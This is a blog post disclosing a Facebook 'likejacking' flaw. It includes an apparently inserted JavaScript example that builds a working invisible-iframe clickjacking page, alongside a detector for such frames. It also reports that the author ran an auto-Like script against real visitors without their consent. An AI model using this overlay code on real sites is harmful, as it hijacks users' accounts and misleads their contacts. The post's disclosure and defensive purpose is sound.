Bill Hartzer

Facebook Account Security Flaw: Sites Auto Posting on Users’ Facebook Walls Without Permission

Even after a user leaves Facebook without logging out, a serious flaw in Facebook’s account security allows any website that user then visits to “Like” a page and post about it on the user’s wall, without the user’s knowledge or permission.

Simple, freely available JavaScript code, placed on any web page, will automatically “Like” a URL and post about it on visiting Facebook users’ walls without their permission or knowledge. A recent test of this code found that it auto-“Liked” the page and successfully posted to the Facebook walls of over 30 percent of the site’s visitors without their knowledge. This is a serious security flaw in Facebook’s account security that must be fixed.

Imagine visiting your Facebook account, viewing your Facebook Timeline, making a few posts on your Facebook wall, and updating your status. Then you leave, without logging out of Facebook, and go to a few other websites. You know, the usual daily routine. For many, it is easier to leave and go to other websites without logging out of Facebook. When you go back to Facebook, you are already logged in; you don’t have to type your Facebook user ID and password again. You can go right to your Facebook timeline to see all of the updates from your Facebook friends.

That is where this Facebook security flaw comes into play. Devious web site owners (some technically call them “Black Hat” webmasters) are taking advantage of Facebook users. By installing simple JavaScript code on their web site, webmasters are able to “fake” a click on a hidden Facebook “Like” button on their site. In practice the click is real: the site embeds the “Like” button in an invisible frame, keeps that frame under your mouse pointer, and lets your own click on what looks like an ordinary part of the page land on the hidden button. Because your browser is still carrying your Facebook session cookie, Facebook treats the click as a genuine “Like” from you (this technique is generally known as clickjacking, or “likejacking” when the target is the Like button). The resulting post on your Facebook Wall promotes their URL or web site to all of YOUR Facebook Friends. You never see the click or the Facebook “Like”, and you most likely will not see that you posted about their web site in your Facebook Status unless you go to Facebook and view your own Facebook Wall. Most Facebook users will never know that they are promoting web sites that they recently visited unless someone tells them about it, because Facebook is designed so that we see all of our friends’ updates on our timeline. It takes a separate click on the Facebook site to view your own Facebook Status updates.
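The following is an added illustration, not the script the author tested or anything from Facebook: it shows the overlay trick the paragraph above describes (a transparent frame holding a “Like” widget that follows the pointer so the visitor’s real click lands on it), and beside it a small static checker that flags such invisible, clickable frames in a page’s HTML. The widget URL, the page markup and the sample inputs are all constructed for the example; `social.example` is a placeholder, not Facebook’s real plugin endpoint.

```javascript
// Added example: the "likejacking" overlay and a static check for it.
// Not the post's own code; the widget URL and markup are hypothetical.

// Placeholder for a framed "Like" widget. Assumption, not a real endpoint.
const WIDGET_URL = 'https://social.example/plugins/like?href=';

// Markup an attacker page would serve (constructed for illustration).
// A harmless-looking button is visible; the widget iframe is fully
// transparent, stacked above everything, and dragged under the cursor,
// so the visitor's own click hits the widget. The browser attaches the
// visitor's existing social-network session cookie to that request.
function buildOverlayPage(promotedUrl) {
  const src = WIDGET_URL + encodeURIComponent(promotedUrl);
  return `<!doctype html>
<button id="decoy" style="position:absolute;top:100px;left:100px">Download</button>
<iframe id="hidden" src="${src}"
  style="position:absolute;opacity:0;z-index:2147483647;width:80px;height:25px;border:0"></iframe>
<script>
  // keep the invisible widget centred under the pointer
  document.addEventListener('mousemove', function (e) {
    var f = document.getElementById('hidden');
    f.style.left = (e.pageX - 40) + 'px';
    f.style.top = (e.pageY - 12) + 'px';
  });
</script>`;
}

// Parse an inline style attribute into a lower-cased property map.
function parseStyle(styleText) {
  const props = {};
  for (const decl of styleText.split(';')) {
    const i = decl.indexOf(':');
    if (i < 0) continue;
    props[decl.slice(0, i).trim().toLowerCase()] = decl.slice(i + 1).trim().toLowerCase();
  }
  return props;
}

// Flag <iframe> elements that are invisible (opacity ~0 or hidden) yet
// positioned and still able to receive clicks. This is the shape of the
// overlay above; a frame with pointer-events:none cannot capture a click
// and is therefore not reported.
function findHiddenFrames(html) {
  const findings = [];
  const iframeRe = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = iframeRe.exec(html)) !== null) {
    const attrs = m[1];
    const srcMatch = /\bsrc\s*=\s*["']([^"']*)["']/i.exec(attrs);
    const styleMatch = /\bstyle\s*=\s*["']([^"']*)["']/i.exec(attrs);
    const style = parseStyle(styleMatch ? styleMatch[1] : '');

    const opacity = style.opacity !== undefined ? parseFloat(style.opacity) : 1;
    const invisible = opacity <= 0.1 || style.visibility === 'hidden';
    const positioned = style.position === 'absolute' || style.position === 'fixed';
    const clickable = style['pointer-events'] !== 'none';

    if (invisible && positioned && clickable) {
      findings.push({
        src: srcMatch ? srcMatch[1] : '',
        opacity,
        zIndex: parseInt(style['z-index'] || '0', 10),
      });
    }
  }
  return findings;
}

// Usage: build the constructed attacker page and scan it.
const demoFindings = findHiddenFrames(buildOverlayPage('https://example.com/promoted'));
console.log(demoFindings);
```

The checker is deliberately simple (it only looks at inline styles), which is enough for the pattern the post describes but not for overlays built from external stylesheets or applied at runtime; a thorough defence lives on the framed side, in the widget provider requiring a visible confirmation that an embedding page cannot cover.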

Security Flaw Affects 31 Percent of Web Site Visitors
In a recent test over a two-week period, I installed a version of some “Auto Like” and “Auto Post on Facebook Wall” JavaScript code on a web site that I own. After running the test on the web site for two weeks (the code has now been removed from the site), the results were impressive but disturbing. The typical visitors to this web site are what I would call “very tech-savvy” people. On this particular test web site where I ran the script, the Average Bounce Rate is 52.41 percent, the Average Time on Site is 7:04 minutes, and 54.62 percent of visits were New Visits. Here are some statistics about the users of this particular test web site:

52.41% Bounce Rate
7:04 minutes Avg. Time on Site
54.62% New visits
45.64% Firefox Users
34.20% Chrome Users
9.36% Internet Explorer Users

Referring Web Sites:
38.24% New Visits Direct to Site
71.27% New Visits from Google
61.90% New Visits from Facebook
83.33% New Visits from Facebook (mobile version)
30.8% Users who Auto Liked and Auto Posted on their Facebook Wall

Nearly 31 percent of these tech-savvy users who visited the test web site were still logged into Facebook, and the script caused them to automatically “Like” the page and automatically posted on their Facebook Wall that they liked the web site, promoting it to all of their Facebook Friends. And although about half of the new visits were direct visits to the test web site, the 3rd and 4th most popular referring sites were Facebook and its mobile version (I am assuming that they came because someone had promoted the web site on their Facebook status): 62 percent of the visits from Facebook were new visits, and a whopping 83 percent of the visits from the mobile version of Facebook were new visits.

What is disturbing here is what happens when you simply visit a website. Not only will you “Like” a URL of the web site owner’s choosing, the web site will also automatically post on your Facebook Wall without you knowing it. If you are logged into your Facebook account, even though you are NOT on Facebook, any website can automatically post on your Facebook Wall without your knowledge. This is a serious Facebook security flaw that Facebook needs to address right away.

How You Can Stop the Facebook Account Security Flaw
At this point, there is really only one way that you personally can stop web sites from automatically posting and auto-“Liking” when you visit them. When you visit Facebook, log in, and when you leave, log out. The attack works only because your browser still holds a valid Facebook session and sends it along with the hidden click; as long as you are logged out of Facebook, that session no longer exists, a devious web site owner cannot force you to automatically “Like” their web site, and they cannot automatically post to your Facebook Wall.

Facebook absolutely needs to take action right away so that this cannot continue to happen. Facebook must protect the integrity of the Facebook “Like” system, or a Facebook “Like” will be meaningless in the future. A good start would be for Facebook to require some sort of Captcha code as part of a Facebook “Like”. The useful property of any such confirmation step is that the user must actually see what they are confirming, so it has to be rendered in a way that the embedding page cannot hide or cover; a confirmation that can itself be placed inside the invisible frame would not help.
